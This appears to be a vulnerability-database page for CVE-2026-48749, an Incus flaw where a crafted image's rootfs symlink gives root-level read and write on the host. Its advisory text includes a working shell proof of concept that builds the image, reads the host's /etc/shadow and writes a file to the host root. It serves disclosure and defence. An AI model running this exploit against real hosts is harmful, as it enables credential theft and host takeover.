CVE-2026-48749

CRITICALPre-NVD 9.99.9
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.9 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.9
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.9Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Incus has an arbitrary file read+write on host via rootfs/ symlink in malicious image

Summary

A specially crafted image can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution.

Details

Incus validates an image as soon as it sees a normal metadata.yaml and a rootfs/ entry, but full extraction can later process a duplicate top-level rootfs symlink. Later, the stopped-container file API opens d.RootfsPath() and passes that file descriptor to forkfile, which chroots to it.

metadata.yaml
rootfs/
rootfs -> /

In practice, this allows a malicious actor to access the host's filesystem with root privileges.

PoC

Below, we map the container's rootfs to / on the host, but it can be mapped anywhere. We then retrieve the host's /etc/shadow file and create a file in /.

#!/bin/sh
set -eu

tmpdir=$(mktemp -d) cleanup() { rm -rf "${tmpdir}" } trap cleanup EXIT INT QUIT TERM HUP

mkdir -p "${tmpdir}/img/rootfs" cat<<__EOF__>"${tmpdir}/img/metadata.yaml" architecture: x86_64 creation_date: 1 properties: description: PoC rootfs symlink host afrw __EOF__

cd "${tmpdir}/img" tar --owner=0 --group=0 -f- -c * >../afrw-rootfs-symlink.tar

inject rootfs symlink

rmdir rootfs ln -s / rootfs tar --owner=0 --group=0 -f ../afrw-rootfs-symlink.tar --append rootfs

incus image import ../afrw-rootfs-symlink.tar --alias afrw-rootfs-symlink incus init afrw-rootfs-symlink afrw-rootfs-symlink

read

incus file pull afrw-rootfs-symlink/etc/shadow "${tmpdir}/shadow" cat "${tmpdir}/shadow"

write

printf 'afrw-rootfs-symlink\n' >"${tmpdir}/afrw-rootfs-symlink" incus file push "${tmpdir}/afrw-rootfs-symlink" afrw-rootfs-symlink/

Impact

Arbitrary file read and write on the host via unsanitized symlink; possibly leading to command execution.

CVSS v3
9.9
EG Score
9.9(low)
EPSS
KEV
Not listed

Published

June 26, 2026

Last Modified

June 26, 2026

Vendor Advisories for CVE-2026-48749(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 44× in last 7d / 67× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 06:10 UTCEG score recompute
  2. 2026-07-07 02:20 UTCEG score recompute
  3. 2026-07-06 22:33 UTCEG score recompute
  4. 2026-07-06 18:45 UTCEG score recompute
  5. 2026-07-06 14:57 UTCEG score recompute
  6. 2026-07-06 11:03 UTCEG score recompute
  7. 2026-07-06 06:45 UTCEG score recompute
  8. 2026-07-06 02:58 UTCEG score recompute
  9. 2026-07-05 23:10 UTCEG score recompute
  10. 2026-07-05 19:17 UTCEG score recompute
  11. 2026-07-05 15:30 UTCEG score recompute
  12. 2026-07-05 11:41 UTCEG score recompute
  13. 2026-07-05 07:53 UTCEG score recompute
  14. 2026-07-05 04:06 UTCEG score recompute
  15. 2026-07-05 00:16 UTCEG score recompute
  16. 2026-07-04 20:28 UTCEG score recompute
  17. 2026-07-04 16:41 UTCEG score recompute
  18. 2026-07-04 12:48 UTCEG score recompute
  19. 2026-07-04 09:01 UTCEG score recompute
  20. 2026-07-04 05:12 UTCEG score recompute
  21. 2026-07-04 01:23 UTCEG score recompute
  22. 2026-07-03 21:35 UTCEG score recompute
  23. 2026-07-03 17:47 UTCEG score recompute
  24. 2026-07-03 14:00 UTCEG score recompute
  25. 2026-07-03 10:10 UTCEG score recompute
Show 42 more
  1. 2026-07-03 06:22 UTCEG score recompute
  2. 2026-07-03 02:33 UTCEG score recompute
  3. 2026-07-02 22:46 UTCEG score recompute
  4. 2026-07-02 18:59 UTCEG score recompute
  5. 2026-07-02 15:10 UTCEG score recompute
  6. 2026-07-02 11:21 UTCEG score recompute
  7. 2026-07-02 07:33 UTCEG score recompute
  8. 2026-07-02 03:45 UTCEG score recompute
  9. 2026-07-01 23:57 UTCEG score recompute
  10. 2026-07-01 20:10 UTCEG score recompute
  11. 2026-07-01 16:22 UTCEG score recompute
  12. 2026-07-01 12:34 UTCEG score recompute
  13. 2026-07-01 08:46 UTCEG score recompute
  14. 2026-07-01 04:59 UTCEG score recompute
  15. 2026-07-01 01:09 UTCEG score recompute
  16. 2026-06-30 21:22 UTCEG score recompute
  17. 2026-06-30 17:35 UTCEG score recompute
  18. 2026-06-30 13:47 UTCEG score recompute
  19. 2026-06-30 09:59 UTCEG score recompute
  20. 2026-06-30 06:10 UTCEG score recompute
  21. 2026-06-30 02:22 UTCEG score recompute
  22. 2026-06-29 22:34 UTCEG score recompute
  23. 2026-06-29 18:47 UTCEG score recompute
  24. 2026-06-29 14:59 UTCEG score recompute
  25. 2026-06-29 11:12 UTCEG score recompute
  26. 2026-06-29 07:24 UTCEG score recompute
  27. 2026-06-29 03:37 UTCEG score recompute
  28. 2026-06-28 23:48 UTCEG score recompute
  29. 2026-06-28 20:00 UTCEG score recompute
  30. 2026-06-28 16:12 UTCEG score recompute
  31. 2026-06-28 12:24 UTCEG score recompute
  32. 2026-06-28 08:36 UTCEG score recompute
  33. 2026-06-28 04:49 UTCEG score recompute
  34. 2026-06-28 01:02 UTCEG score recompute
  35. 2026-06-27 21:13 UTCEG score recompute
  36. 2026-06-27 17:25 UTCEG score recompute
  37. 2026-06-27 13:38 UTCEG score recompute
  38. 2026-06-27 09:51 UTCEG score recompute
  39. 2026-06-27 06:03 UTCEG score recompute
  40. 2026-06-27 02:16 UTCEG score recompute
  41. 2026-06-26 22:27 UTCEG score recompute
  42. 2026-06-26 18:39 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-48749?
CVE-2026-48749 is a critical vulnerability published on June 26, 2026. Incus has an arbitrary file read+write on host via rootfs/ symlink in malicious image Summary A specially crafted image can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution. Details Incus validates an image as soon as it sees a normal…
When was CVE-2026-48749 disclosed?
CVE-2026-48749 was first published in the National Vulnerability Database on June 26, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-48749?
CVE-2026-48749 has a CVSS v4.0 base score of 9.9 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-48749?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48749, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-48749

Explore →

Is Your Infrastructure Affected by CVE-2026-48749?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.